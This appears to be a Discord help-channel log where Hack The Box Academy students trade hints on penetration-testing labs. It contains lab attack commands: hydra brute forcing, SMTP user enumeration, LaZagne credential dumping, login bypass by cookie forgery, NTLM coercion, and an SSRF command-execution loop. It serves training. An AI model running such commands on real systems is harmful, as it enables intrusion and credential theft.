#modules

1 messages · Page 126 of 1

fresh compass
#

Can I dm you?

acoustic owl
#

No, the Attacker Host accesses port 8000 of the target via port 8080.
So from the Attacker Host to the Target and not from the Target to the Attacker Host

acoustic owl
short hare
#

Stuck on ATTACKING COMMON SERVICES: Attacking Common Services - Easy
Question:
You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer.

Got accessed to mysql server
Upload the backdoor
When running the cmd=___ from the site in firefox, I am only able to run 'whoami' and 'dir' and 'more' doesn't work.

Further stucked... Can anyone help?

round gale
rustic sage
#

@short hare you can read the flag with type. the path is quite obvious

twilit wharf
#

I got that error too at first. I think I was able to fix it by running impacket as root, since root has an installation of impacket which is more updated than the user one. Btw if you are still working on the module feel free to DM

#

I am still stuck on Q3 of the NTLM Relay Skills Assessment. I am even starting to suspect that there is something wrong with the lab.

dusky rivet
#

Hello guys, need a hint for the Lab Easy for the module "Attack Common".

Ports : 21 ftp, 25 smtp, 80 http, 443 https, 587 smtp, 3306 mysql, 3389 rdp
Enumeration user : I used the git https://github.com/cytopia/smtp-user-enum with the command: || smtp-user-enum -m RCPT -U USER_LIST_IN_RESSOURCES.txt -d 'inlanefreight.htb' TARGET_IP 25 || and i found :
user : ||fiona|| / account disabled ||jason and marlin||

So? So I tried brute force on ftp:

  • hydra -l f_user -P password_in_ressources.txt ftp://target -t 32
  • same but with user : f_user@inlanefreight.htb
  • same again with capital F (--> hydra -l F_user -P password_in_ressources.txt ftp://target -t 32 && same with domain)

I tried this for : ftp, rdp, smtp, mysql (do not try this or you ll get blacklisted and must restart the target to refresh it).
0 valid password. anonymous isn't enbale for ftp.

Question: Where to start... I'm kinda stuck.. I tried to enumerate the web site but nothing interesting too

tranquil axle
#

I think the top left arrow is jus the attack host establishing a ssh connection with the „listen on 8080 and send it to my 8000“ directive. The actual sending of data is the other red arrow

tranquil axle
latent meteor
#

one question about the module "Shells & Payloads": for the live engagement to get the credentials for the initial vector (as exposed on the first Hint), is there a way to get to those credentials without looking at any hint? The password is not present on any list and I would like to understand if possible how can one get there without looking into the hint. Thanks!

fathom pendant
#

Clearly labeled :)

umbral fulcrum
#

Hey Guys I'm in "Password Attacks " : "Password Attacks Lab - Hard"
got the credentials of user J & d cracked the Logins.kdbx
but I can't use this credentials 4 anything ,
I've tried 2 connect with evil-winrm as david (didn't worked out ), tried to do xfreerdp as david (didn't worked out), tried 2 access the folder of administrator & david (didn't worked put)...
can some1 give me a hint please, not sure what ells 2 do ...

latent meteor
# fathom pendant I think there's credentials on the foothold machine

Yes but when going to Host 1 I’ve enumerated, then explores the shares, then the service that is the first vector..tried to bruteforce with no hit..then in went to the hint and there was the suggestion of username and password Host1 vulnerable vector I was trying to bruteforce with the service known lists. My question is more around if there was anyway to get these creds without looking at the hint (btw thanks a lot for (replying)

fathom pendant
#

It's on the desktop of the foothold system

latent meteor
#

Thanks

fresh compass
#

Hi, since yesterday my proxychains seems down and I dont know why. I was doing a module yesterday and I use dynamic port forwarding properly but today wasnt working. I have been trying a lot of things but my proxychains doesnt work... Anybody know why?

#

And the host is there

acoustic owl
#

Ping does not work with chisel

vocal tusk
#

hi guys im in the password module and im trying to use lasagnia.exe to look for passswords. i get the exe to the target i open cmd and run start lasagnia.exe it runs but the cmd with the results closes as soon as the script finishes i dont have time to actualy read results

acoustic owl
#

Open cmd.exe and run lazagne.exe inside cmd.exe

plain badge
#

hey y'all ,I am new to HTB academy. I completed the intro to academy and half of the Linux fundamentals modules by using free pwn box instance until it hit the time limit. My laptop runs on Ubuntu OS. Is it possible for me to complete the remaining module using ubuntu terminal ? If so, how?

vocal tusk
#

and it all runs as planed i can see output but as soon as its done its thing the window with the output closes andi dont have time to actualy read it

#

i tried start lasagne.exe all > output.txt too so it prints it and i dont have to worry bout it

#

but it makes an empty file

acoustic owl
#

Don‘t use start

#

Only lazagne.exe all

vocal tusk
#

thank you my good sir i now have a populated text file

umbral fulcrum
#

Did some1 encounter in Kali's safe mode?!

rustic sage
#

hello guys how i can detect 3 way TCP handshake from pcap file by tcpdump

#

anyone end this module

median vine
trail depot
main meadow
#

Hi, im currently doing attacking common service module - "Find all available DNS records for the "inlanefreight.htb".
Keep getting this error when using subbrute.py - "get_ns_blocking - Resolver list is empty.". From my understanding, I already set all the correct details in resolvers file.

Also i heard only subbrute.py able to get the h... subdomain but not other tools like dnsenum.

rustic sage
#

I'm also on the same as you @main meadow, mind if we brainstorm a bit?

main meadow
rustic sage
#

Imma just get up to speed, but I got subbrute to work once, lemme try again

main meadow
#

lol...

rustic sage
#

Yes that helps, instead of wiping you need to add

#

I saw you ran against .htb you sure it's not .com domain we are targeting?

main meadow
rustic sage
#

You're right, I didn't get a respond earlier so thats why I started wondering :/

swift tartan
#

Hi! Currently working on WINDOWS PRIVILEGE ESCALATION - Windows Privilege Escalation Skills Assessment - Part I

I already have a meterpreter shell with limited priviledges and think I am on a juicy track to priv escalation, but there are some things that don't work as expected. Can somebody maybe support me here? I don't want to spoil too much by asking the question directly.

undone narwhal
brazen saffron
#

Quick question about getting started module and gobuster, there is a way to improve the speed 🤔 ?

rustic sage
#

is identification working rn

#

the discord bot

latent sage
#

hi there stuck on Password Attacks : Linux Local Password Attacks | Credentials Hunting on linux

what i have tried so far :
1 Obtain kira password
2 login as kira through ssh
3 Found a Notes.zip file did zip2john and tested it againt a wordlist. No hit

stuck from here

light flume
#

I'm working on the knowledge check for the getting started module. I crafted the cookie but when I pass it to the IP with curl I can't find it in dev tools. I don't know what I'm doing wrong.

#

Additionally, I don't really know what to do to upload the file after the session cookie is present on the webserver.

rustic sage
#

For future references; If you're stuck on Attacking common service module - DNS, check your resolve.conf, VPN can be issue here. Or just keep it simple and use the pwnbox....

light flume
#

I'm using the pwnbox

#

I passed the cookie with
'''curl --cookie "NAME=VALUE" IP

#

'''curl --cookie "NAME=VALUE IP'''

rustic sage
#

@brazen saffron -t flag to set # threads

brazen saffron
#

Ah.

light flume
#

code output test

brazen saffron
#

Alright thanks.

light flume
#

Can someone plz point me in the right direction with using the session cookie for the getting started module knowledge check?

rustic sage
tranquil axle
light flume
#

That

#

That I didn't know.

tranquil axle
#

You can set cookies in the dev tools manually

#

Maybe that is what you want to do

light flume
#

So I passed the cookie as
curl --cookie "NAME=VALUE" 10.x.x.x
I'm not sure which url to pass it to, though. And I'm not sure how to upload my php one-liner to get the reverse shell.

tranquil axle
#

It’s kind of hard to tell where you are stuck, in the knowledge check they want you to identify what is running on the Webserver and find a public exploit for it to get a reverse shell. Have you found what is running on the Webserver and what exploit is available?

light flume
#

I'm not going that route. I found the exploit and researched it. I created a cookie based on the vulnerability found in /admin/theme-edit.php

#

the cookie should be sha1(getsimple_cookie_3315{apikey}={username}{apikey}

#

i mistyped that, both name and value are hashed with sha1 in this case

tranquil axle
#

I don’t remember the exploit, but you have the apikey to craft the cookie?

light flume
#

yeah i have crafted the cookie. I just don't know what to do with it lol

tranquil axle
#

Sounds like you can just set that in the dev tools then and manually browse the admin page?

light flume
#

that's what i was thinking too. To set a cookie in the browser do I click the + in the storage tab? When I do that it doesn't request input.

tranquil axle
#

The + should add a entry in the list that you can change with doubleclick

latent sage
light flume
#

@tranquil axle I added the cookie to the /admin/index.php url. I refreshed the page but it's still requesting login.

tranquil axle
#

Try setting it not for admin but the normal url maybe

rustic sage
latent sage
light flume
#

@tranquil axle Tried that too, both pages

rustic sage
latent sage
#

thanks btw

tranquil axle
light flume
#

no i missed that. What other cookie?

tranquil axle
#

GS_ADMIN_USERNAME={username}

#

I just tried it and with both set it worked for me to bypass the login

light flume
#

i logged in with admin:admin and no cookie. geez.

tranquil axle
#

Oh you mean those were the default credentials?

light flume
#

yeah lol

#

i think i need the cookie to upload files tho. checking it out now.

tranquil axle
#

Nah you can edit themed once you are admin, the cookie was just to bypass the login

pearl flint
#

password attack hard lab is smb server suppoesed to give this error?

tranquil axle
#

That being said you can take a look at what cookies are set now and how they are different from yours

light flume
#

got a reverse shell

#

oh damn i did a find for *.sh and crashed the pwnbox

#

my browser keeps trying to go to a secure http URL. I turned HTTPS Everywhere off thinking that would make a difference. Why is firefox continously adding the https scheme?

#

i set the network.stricttransportsecurity.preloadlist variable to false in about:config. That didn't help.

#

i also set the browser.fixup.fallback-to-https variable to false. It's not defaulting to https any longer, but still wont load the uri. So 🤷

main meadow
#

try appending a newline in the resolvers file after each ip, everything will be fixed after that

lusty thicket
light flume
#

My target IP address has Hello World, not the getsimple cms. What's going on?

#

I've tried resetting the target several times

#

logged out and back in fixed it

fleet belfry
#

I am working on NTLM Relay Attacks - Authentication Coercion and I have a question. I was able to get the answer correct but looking at questions #2 I am not getting ' [+] (ERROR_BAD_NETPATH)' when i use the command: Coercer coerce -t 172.16.117.60 -l 172.16.117.30 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' -d inlanefreight.local -v --always-continue I get: [!] (NO_AUTH_RECEIVED) for everyone of them.

kind turret
iron plaza
#

Guys I am in the Active Directory Enumeration & Attacks LLMNR/NBT-NS Poisoning - from Windows and when I try to rdp using xfreerdp I end up getting a black screen with nothing else. Is this a tech issue with HTB right now?

rustic sage
#

bro im so confused

#

what tf do I do?

rustic sage
#

this stupid thing is telling me to run command cd and I dont kno how to do that 💀

iron plaza
rustic sage
#

bruh

#

how do I run command cd

iron plaza
rustic sage
iron plaza
#

which module is this and what section

rustic sage
#

im the definition of a noob rn

iron plaza
rustic sage
#

it sthe first "lesson"

#

of the entire hack the box course

iron plaza
#

send me the link here

iron plaza
rustic sage
#

wtf am I supposes to do

#

look it says what does acronym vm stand for

#

and I do not know'

#

so I go to the walkthrough

#

and it says run command cd

iron plaza
#

well maybe you should first join the HTB academy before going on solving problems in the main site

iron plaza
lusty thicket
runic rampart
#

Good night!
Detecting Windows Attacks with Splunk.
Detecting ransomware.
Modify the action-related part of the Splunk search of this section that detects excessive file overwrites so that it detects ransomware that delete the original files instead of overwriting them. Run this search against the "ransomware_excessive_delete_aleta" index and the "bro:smb_files:json" sourcetype. Enter the value of the "count" field as your answer.
The answer is not correct, I can’t understand what I’m doing wrong.

onyx sonnet
#

Anyone able to assist me break this AES-256 Encryption with hashcat ?

fathom pendant
fringe shell
onyx sonnet
#

@fringe shell I’m breaking into a bank

#

Jk I need it for a track on labs

fathom pendant
solemn wolf
#

i dont remember my discord password ngl

fathom pendant
#

But also just do password reset since youre logged in

solemn wolf
fathom pendant
#

Google is a free to use search engine my guy

solemn wolf
fathom pendant
#

OK? You generally don't need the email to reset the password if logged in

#

Either way if you're really up the creek, just message actual discord support via email. (Yes you'll need to set up a new email too)

rustic sage
#

um

#

I cant access firefox

#

what do I do?

fathom pendant
rustic sage
#

wdym terminal

#

ohhhh ok I think I got it

fathom pendant
#

Terminal refers to the command line window

rustic sage
fathom pendant
#

Are you trying to access the internet in the in-browser vm?

rustic sage
#

im trying to ddo the next step in the academy, and I have to use firefox

fathom pendant
#

I guess I'm confused on what you meant by "can't access firefox"

rustic sage
fathom pendant
#

What module are you doing?

#

And section

rustic sage
fathom pendant
#

That's vague af

rustic sage
#

segment 5

rustic sage
fathom pendant
#

At the top of the screen, what is the name of it

rustic sage
#

interactive section with target

fathom pendant
#

Did you spawn the target from the "spawn target" interactive text line?

fathom pendant
#

I am using English

rustic sage
#

so I went to firefox

fathom pendant
#

It should work

rustic sage
#

like it said

fathom pendant
#

What do you mean it didn't work?

rustic sage
fathom pendant
#

I just clicked it myself and after "spawning target" it shows a public ip with a port [ip:port]

fathom pendant
#

Send a screenshot after you clicked the "Click here to spawn target!"

rustic sage
#

nothing happens

lusty thicket
fathom pendant
#

I see a public ip and port on your screenshot my guy

rustic sage
fathom pendant
#

Oh wait

#

No that's just a screenshot of the example

rustic sage
#

😐

#

yes

#

but that is the url

fathom pendant
#

No

rustic sage
#

I need to use

lusty thicket
fathom pendant
#

It's not

rustic sage
#

wtf do I do then

fathom pendant
#

Scroll down

#

To just above the question

rustic sage
fathom pendant
#

The reason it wasn't working for you initially is because you were clicking the text block explanation

#

Keeeeeeeep going

rustic sage
#

😐

fathom pendant
#

Bingo

rustic sage
#

how do I answer that

fathom pendant
#

...

rustic sage
#

if I didnt research a target url

fathom pendant
#

I will punt you to the sun

#

Click the text

rustic sage
#

im a noob bruh

#

oof

#

lmao

fathom pendant
#

You're also lacking reading comprehension

rustic sage
#

k did it

rustic sage
fathom pendant
#

Now just visit http://ip:port

rustic sage
fathom pendant
#

9 times out of 10 (unless specified) the example IP will not be your actual target ip

fathom pendant
#

As you just experienced. Reading the whole page is crucial to moving forward

twin canyon
#

I was having an awesome time working on "Windows Event Logs & Finding Evil" yesterday. However, about 24 hours ago the Target Machines started kicking me out after 1 minute into my RDP session. Is this a temporary issue - do you have any suggestions except for to keep trying to reset the target?

rich perch
#

Also try switching VPN servers or switching protocol

twin canyon
#

Thanks for the quick response - I also have been trying the pwnbox and I get an error that there are no available instances

short hare
rich perch
fringe shell
fringe shell
short hare
fringe shell
short hare
#

ok let try once more

fringe shell
short hare
fringe shell
short hare
twin canyon
rustic sage
#

There is an issue with the parrot machine

rustic sage
rich perch
light flume
#

I'm trying to get root.txt for the getting started knowledge check. I'm having trouble. I've uploaded LinEnum.sh and ran it. It says I can read the shadow file, but it's permission is restricted to root, so I'm thinking that's the wrong way to go. I think I need mrb3n user password to escalate privileges. I'm kinda stuck. Can I get a hint?

rustic sage
#

@short hare the absolute path. For instance, type C:\Users\Godzilla\Desktop\flag.txt

final maple
#

Hi, were you able to crack the hash? I used ||-m 18200|| but it hasn't been working for me.

jagged canopy
#

hello

final maple
#

Anyone know how to crack a ||$krb5asrep$18$|| hash? I am on the Kerberos Attacks - Skills Assessment

final maple
jagged canopy
#

fine , just keep it in bg , and in other terminal tap use it as raw " john hash.txt"

neon ingot
#

Hydra -L username.txt -P password.txt ssh:// ip -t 8

final maple
neon ingot
#

I didn’t use a hash

final maple
#

Just got it! With ||Kerbrute|| Make sure to use the ||--downgrade|| flag

rustic sage
#

bro what is the differ between normal vitrual vm and docker

coarse shadow
#

what

#

is that

plain coral
#

Anyone else having trouble with Starting Instances?

lunar urchin
#

Same here

short hare
lunar urchin
#

Evenif I logout and reconnect. Still not working

rustic sage
#

samr error for me can't start the box

#

@short hare did you manage to get the flag?

short hare
#

Can I DM you if I get again stuck?

rustic sage
#

yes

short hare
#

Ok...

short hare
frank vine
rustic sage
#

neither can I

frank vine
#

I did try support but the GPT ai was directing me to openvpn troubleshooting not pwnbox.

short hare
#

now started the module with VPN file sadglas

frank vine
#

I'll prob use my kali vm with vpn too if it persists or just read and take notes and try the exercises later.

digital inlet
#

WINDOWS ATTACKS & DEFENSE - DCSync . After performing the DCSync attack, connect to DC1 as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the Task Category of the events generated by the attack?

#

I don't list answers what to fill in, can someone help me?

noble fiber
silver mesa
#

Hey guys, has anyone else being issue trouble in starting Pwnbox instances. Since the whole day.

noble fiber
#

i came here to ask this question, i see many have this issue

silver mesa
#

exactly

naive wadi
#

Got a strange one, I can't seem to SSH into the linux machine with the provided creds for the privileged access section of active directory enumeration & attacks. Keeps telling me the password is wrong.

#

Before anyone asks I am copying and pasting as well as verifying it is right

#

Unsure if they have changed the password and not updated the module?

#

I keep getting a permission denied error

#

ssh htb-student@172.16.5.225

#

That looks normal right I am not losing my tiny mind

#

I don't need to pivot, i'm RDP'd on a computer with two nics

#

I can ping the host

#

So it's up. And I am using the credentials provided

acoustic owl
naive wadi
#

Doesn't actually provide a port

#

"For the portion of this section that requires interaction from a Linux host (mssqlclient.py and evil-winrm) you can open a PowerShell console on MS01 and SSH to 172.16.5.225 with the credentials htb-student:HTB_@cademy_stdnt!."

acoustic owl
#

then it should work....

naive wadi
acoustic owl
naive wadi
#

Tried that, I have been having this issue with this section. I will contact support.

#

Thanks

upbeat briar
#

Is anyone lese getting this message when trying to spawn their PwnBoxes??

digital inlet
#

I also encountered the same problem, now I use openvpn to connect

silver iris
#

Hey guys i have a question:
I´m currently working on the Footprinting medium lab.
I found the nfs share, mounted it, and got permission denied. I googled around a little and found that you can just "sudo su". I just dont understand how permissions work in this scenario. Why can i access the share with those permission, but not just like that. I seem to not get something here. Any tips how i can read up on this specificly?

short hare
# silver iris Hey guys i have a question: I´m currently working on the Footprinting medium lab...

As far as I recall
It's just like if you want to delete some system file from Linux directory, it says permission denied. But if you switch from current user to root you have the permission to delete that file even though you're in the same system.

In certain cases, you won't even be able to do sudo su. In those cases switching users from a current account to other is denied.

In the above you have the permission to switch to other users from the same OS or whatever

silver iris
#

Ok if it´s just like that thats fine with me. I was just confused, because usually when i mounted an NFS share i could just cd in right of the start.

short hare
torpid coyote
#

Im doing the Identifying Hashes section on Cracking passwords with hashcat module
The one question at bottom on Identifying hashes section asks to identify the hash

The hash is very clearly a || Drupal7 || hash, all tools i use say it but when i enter it, etc its wrong.

Have i misunderstood the task or something ?

#

Fixed ^^
Solution: Submit the full output from the command you are running.

sly kelp
torpid coyote
# sly kelp Can you use any other hash identifier tool

It asks you to use hashid, but i prefer to use tools such as Name That Hash and Search That Hash.

I just find it easier to look at and navigate trough, it gives you pretty much the same answer but less work, automatically outputs hashcat modes, etc.
Search That Hash basicly uses name that hash but then check if its been cracked before, etc, so it can give you an easy answer.

I just used search that hash and got the answer for most my questions on the module but i also did it the normal way

sly kelp
dusky rivet
#

Hello Guys,
Hope you enjoyed your weekend!
I'm reaching you for a hints looking for - Attacking Common Services - Lab Hard

Intro : I found user ||fiona|| though the ||smbclient|| (with the user ||john and simon||. I Bruteforced the password of them on RDP. I got Fiona.
Now I'm on RDP with her. I saw there is a MSSQL. So I'm trying to connect on it with the password of Fiona but without success..
I tried :

  1. sqsh -S TARGET -U ||fiona|| -P Password (I tried with quote also)
  2. mssqlclient.py (from impacket) : /usr/share/doc/python3-impacket/examples/mssqlclient.py -p 1433 ||Fiona||@TARGET
  3. On the winodws machine via cmd : sqlcmd -S localhost -U ||fiona|| -P PASSWORD
  4. Via GUI on sql server profiler

Nothing of them worked.
I'm kinda stuck.
Thanks in advance 🙂

dusky rivet
#

prob one hour lost for this

tough blade
proven nimbus
ornate arrow
#

try without .

vital adder
torpid coyote
cyan bay
#

hey guys i need help for install -r requirements.txt for python in ubuntu

sly kelp
boreal vine
#

Hey I need help on Active Directory Enumeration & Attacks Privileged Access

orchid pine
#

hello guys im on this question Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer. i have read permissin on the users shares but no flog inside the share any help plzz im stuck here for hours

acoustic owl
#

Check the User dir. Normaly it is in the Desktop or Documents Folder

boreal vine
#

Hey I need help on Active Directory Enumeration & Attacks Privileged Access for the question "Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt."

acoustic owl
#

what exactly is not working? What have you tried?

jagged oak
#

ahhh hello... i want to learn... can any one guide me with this?

vital adder
# cyan bay hey guys i need help for install -r requirements.txt for python in ubuntu
compact patrolBOT
silk valve
#

Is htb academy content restricted content ? As in not to be streamed ?

trail depot
boreal vine
#

Hey I need help on Active Directory Enumeration & Attacks Privileged Access for the question "Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt." (I think something didn't work well)

acoustic owl
#

what exactly is not working? What have you tried?

acoustic owl
# jagged oak ahhh hello... i want to learn... can any one guide me with this?

Not sure where to start from? We'll have you take your first steps in no time 👣
📝 Check out @darkstar7471's video on how to kick off your learning journey on #HTBAcademy in this step-by-step, guided series. Watch now: https://t.co/0jSjEPx61N

#HTB #CyberSecurity #Hacking

zinc marsh
final maple
#

Has anyone completed the last question on the Attacking Kerberos - Skills Assessment module? I used Rubeus to find the TGT of a new user, but that user and my current user are not Domain Admins.

languid galleon
#

3

half inlet
#

Hey all, I was working on the Footprinting easy lab ( https://academy.hackthebox.com/module/112/section/1078)
I found the solution eventually, but I dont understand it.
||I nmapped the server and found there was a 21, and 2121 - I understand that 21 is the FTP server, and 2121 is an FTP proxy - but I really don't understand what that means in general and in regards to this lab - I tried researching it on google, but I couldn't really make sense of it. I found the solution on a forum online saying to download all the files from port 2121 instead of 21, but I do not understand why this works - any help?||

fathom pendant
#

And vice versa

half inlet
#

Oh, is it not a proxy?

fathom pendant
#

Not necessarily

#

A proxy would mean that it's an intermediary

#

Not direct

half inlet
#

I tried using the ftp command with that port and it didn’t net any results so I thought it didn’t exist, but wget worked

thorn urchin
#

services can run on ANY port. The common shit like port 21 is just the default

fathom pendant
#

It works just fine

#

You probably did ls and saw it empty

half inlet
fathom pendant
#

And didn't do ls -la

half inlet
#

But how come there is also another ftp server on 21? Are you able to have two on one server

fathom pendant
#

Yes

#

You can have multiple

half inlet
#

I see

#

So both 21 and 2121 had an ftp server but 21 was blank and 2121 was the real one

fathom pendant
#

Much like you can have multiple http servers on multiple ports

fathom pendant
#

:p

half inlet
fathom pendant
#

You probably misread that someone's enumeration only showed 1 ftp server running

half inlet
#

Ah yeah probably

fathom pendant
#

When there is in fact 2 services running

half inlet
#

Well thank you! I understand now haha

fathom pendant
#

¯_(ツ)_/¯

#

Just don't get caught up on things that [in the end] aren't all important

half inlet
#

Haha alright, thank you

plain shell
#

Did you ever get past this? i am unsure if my payloads are all just wrong or if the lab is having issues 😄 probably the former but worth an ask

pale wraith
#

if i pivot from an user1 to an user2, can i get the password to "sudo" commands as user2?

thorn urchin
#

depends on how you pivoted

#

if what youre really asking is how to find the password of a user you have access to but dont have the password then generally you cant unless you find a clue somewhere in the system or the user has elevated permissions to read /etc/shadow or the likes

pale wraith
#

i tried reading /etc/shadow with the user i pivoted into, but didnt have permission, so yeah, no good so far

stark ferry
#

Can I Hack Roblox?

fathom pendant
neon ingot
#

Lol

proven moat
fringe shell
#

The slideshow like performance when trying to navigate around the RDP connection for the Documentation and Reporting lab is making me want to throw my keyboard out the window sadglas

final maple
#

Anyone finish the Attacking Kerberos module who can help me with the last question?

thorn urchin
stable mulch
#

Hello
Any one know a machine which replicate Account Take Over attack

atomic briar
#

Man, just finished Pass the Ticket (PtT) from Linux but it absolutely kicked my ass and exposed a fair bit of knowledge gaps in that area for me. Will definitely be something to further revise.

acoustic owl
placid mural
#

hello all 🙂

#

I have a question

#

I'm new and don't know where to start

boreal vine
#

Hey I need help on Active Directory Enumeration & Attacks Privileged Access for the question "Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt." (I think something didn't work well I got a timed out)

acoustic owl
boreal vine
#

Well we need to connect to ip 172.16.5.150 and get a shell with SQL (xp_cmdshell) to read a FLAG but the service is really slow I've tried with mssclient.py and MSFConsole... with PowerUpSQL from the Windows host i can execute SQL command

#

If i try to execute command i don't have the command return

acoustic owl
#

Sometimes it must be activated first. This is also shown in the modules

boreal vine
# acoustic owl Is xp_cmdshell active?

he is activate but it's not the problem I can't access the service with mssclient from my host (what the hint say) if xp_cmdshell is or not activated I shouldn't have a Timed error

acoustic owl
#

Have you tried it from the pwnbox?

boreal vine
#

well nop I have my own setup

#

I have solved it with PSSession but just wanted to know if I'm doing something wrong

acoustic owl
#

Try it from the PwnBox.
If it works there, it is an error of your VM. If it doesn't work there either, it is either an error of the tool/lab or a faulty application of the tool.

final maple
#

Ugh, last question on Attacking Kerberos is killing me

final maple
# acoustic owl Why?

I have tried renewing the ticket on the new user I found through Rubeus, and I still can't read the DC01 share

#

I even used Metasploit to priv esc to nt authority\system, and that didn't help

acoustic owl
#

Metasploit will probably not help you in this case

final maple
acoustic owl
vagrant orbit
#

Is anyone able to help me with the PTT module, stuck trying to use the ticket to get into the DC

#

Have copied the ticket from the target host to my attack host, set up chisel, but upon trying to use the ticket I keep getting access denied

raven locust
#

feel free to dm

quick magnet
#

hi im on
module: Pivoting Tunneling
section: Remote/Reverse Port Forwarding with SSH
want to try gain reverse shell in msfconsole, but it seem doesn't work.

coarse void
quick magnet
coarse void
quick magnet
vagrant orbit
coarse void
vital adder
#

but what module and section are you on? also which question?

vagrant orbit
#

It was but I think he is busy

#

I am on PTT, last question

#

Got the ticket, set it as my KRB5CCNAME variable, tried to pass the ticket

#

but alas, no luck

vital adder
vagrant orbit
#

yes indeed

vital adder
vagrant orbit
#

its a kirbi file? I thought it was ccache

#

because the file is called ccache_....

vital adder
#

it't depends on what you use to dump the ticket if mimikatz then it's a kirbi file (nvm same format for Rubeus)

vagrant orbit
#

Can I DM you so I don't spoil it for ppl

vital adder
wind magnet
#

Why is the machine not being created?

coarse void
#

@quick magnet can you dm me ur commands

#

looks like ur listening on the wrong ip address

#

||ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN||

quick magnet
coarse void
#

you need the internal IP of the pivot host

#

since the payload connects to the pivot host, and you want to listen on the internal ip of pivot host then redirect it back to your attack host

#

check the diagram in the session

quick magnet
#

so the InternalIPofPivotHost is attack host ?

coarse void
#

nah

#

pivot host is the host you have access to in the internal network

#

in this case its the ubuntu server you ssh into

quick magnet
#

ah i see, let me change it

coarse void
covert grail
#
● openvpn@new.service - OpenVPN connection to new
     Loaded: loaded (/lib/systemd/system/openvpn@.service; enabled; vendor preset: enabled)
     Active: activating (auto-restart) (Result: exit-code) since Mon 2023-09-11 09:28:58 UTC; 2s ago
       Docs: man:openvpn(8)
             https://community.openvpn.net/openvpn/wiki/Openvpn24ManPage
             https://community.openvpn.net/openvpn/wiki/HOWTO
    Process: 4643 ExecStart=/usr/sbin/openvpn --daemon ovpn-new --status /run/openvpn/new.status 10 --cd /etc/openvpn --script-security 2 --config /etc/ope>
   Main PID: 4643 (code=exited, status=1/FAILURE)
        CPU: 20ms

Sep 11 09:28:58 ahmadiarian981 systemd[1]: openvpn@new.service: Main process exited, code=exited, status=1/FAILURE
Sep 11 09:28:58 ahmadiarian981 systemd[1]: openvpn@new.service: Failed with result 'exit-code'.
Sep 11 09:28:58 ahmadiarian981 systemd[1]: Failed to start OpenVPN connection to new.```
#

hey guys i cant connect to .ovpn

coarse void
covert grail
#

it will stuck

covert grail
# coarse void use `openvpn <vpnfile.ovpn>` to connect
2023-09-11 09:38:09 OpenVPN 2.5.5 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Jul 14 2022
2023-09-11 09:38:09 library versions: OpenSSL 3.0.2 15 Mar 2022, LZO 2.10
2023-09-11 09:38:09 Outgoing Control Channel Authentication: Using 256 bit message hash 'SHA256' for HMAC authentication
2023-09-11 09:38:09 Incoming Control Channel Authentication: Using 256 bit message hash 'SHA256' for HMAC authentication
2023-09-11 09:38:09 TCP/UDP: Preserving recently used remote address: [AF_INET]23.19.60.155:1337
2023-09-11 09:38:09 Socket Buffers: R=[212992->212992] S=[212992->212992]
2023-09-11 09:38:09 UDP link local: (not bound)
2023-09-11 09:38:09 UDP link remote: [AF_INET]23.19.60.155:1337```
coarse void
#

it stucked at the line UDP link remote: [AF_INET]23.19.60.155:1337?

coarse void
frozen mesa
#

SQLMAP ESSENTIALS --> Running SQLMap on an HTTP Request -->What's the contents of table flag2? (Case #2)

How to start? I've intercepted with browser dev utility but i dont see anything to start with, same for burp suite interception. Any nudges?

silver mesa
#

Access the given IP:PORT in browser -> click on case 2.
Intercept the correct request and identity which paramater is vulnerable for SQL, then save the request in a file and try with sqlmap -r flag

still yacht
#

In module "Server-side Attacks" in section "SSRF Exploitation Example"

Please change or review the code for injection is JS function rce() { function> while true; do function while> echo -n "# "; read cmd function while> ecmd=$(echo -n $cmd | jq -sRr @uri | jq -sRr @uri | jq -sRr @uri) function while> curl -s -o - "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=${ecmd}" function while> echo "" function while> done function> }

to

  while true; do
    echo -n "# "; read cmd
    ecmd=$(echo -n $cmd | jq -sRr @uri | jq -sRr @uri | jq -sRr @uri)
    curl -s -o - "http://<target ip>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=${ecmd}"
    echo ""
  done
}

Due to the problem of parsing error if you trying to make the function that is in the acadamy atm

Best Regards Angry 🙂

PS just so you can copy and paste the code easier

delicate steeple
#

Hi guys, I am doing AD enumeration and attacks skill assessment. I am stuck on second question on kerberoasting. I cannot find any account that can be authenticated against DC for it to work. I was able to get administrator hash from the jump host but it did not further me in any way. I have also tried kebrute but did not work. I got reverse meterpreter shell and hooked up proxychains so I can get into the network. I have discovered the MS01 and DC ips.

covert grail
#

every thing i do i cant ping or do anything with this domains

acoustic ibex
#

/etc/hosts

covert grail
#

didnt work

past garden
#

I always put them in the same line

acoustic ibex
#

try

10.129.229.49  inlanefreight.local app.inlanefreight.local dev.inlanefreight.local
#

all on the same line

rustic sage
#

sorry i know this is offtopic but i've tried reaching out to staff and mods. but the hackster bot is giving me an error whilst trying to indentify myself

analog dock
#

Has anyone done the skills assessment in: “Introduction to threat hunting & hunting with elastic”? I managed to find the answer on question 1 and 3, but stuck on the 2nd. I know d*.exe sets a registry but neither the one B or svc makes seems to be right. Am I missing something or just doing it wrong entirely?

#

@acoustic owl perhaps you have done it?

#

It’s in the soc path

pearl torrent
#

Did anyone finish the attacking enterprise networks: web enumeration & exploitation section? I am getting a proxy error trying to do the WordPress login... not sure whats going on?

acoustic owl
#

No, 5 modules are still missing

analog dock
eager siren
#

Hello am stuck. Am doing the Introduction to Maleware Analysis, the last question of the skill asesement is this. After which function in x64dbg should a breakpoint be placed to unveil the decrypted content of the .tmp file? Answer format: C__________t. I even followed the hind but i could not find the function. Plse someone can help me?

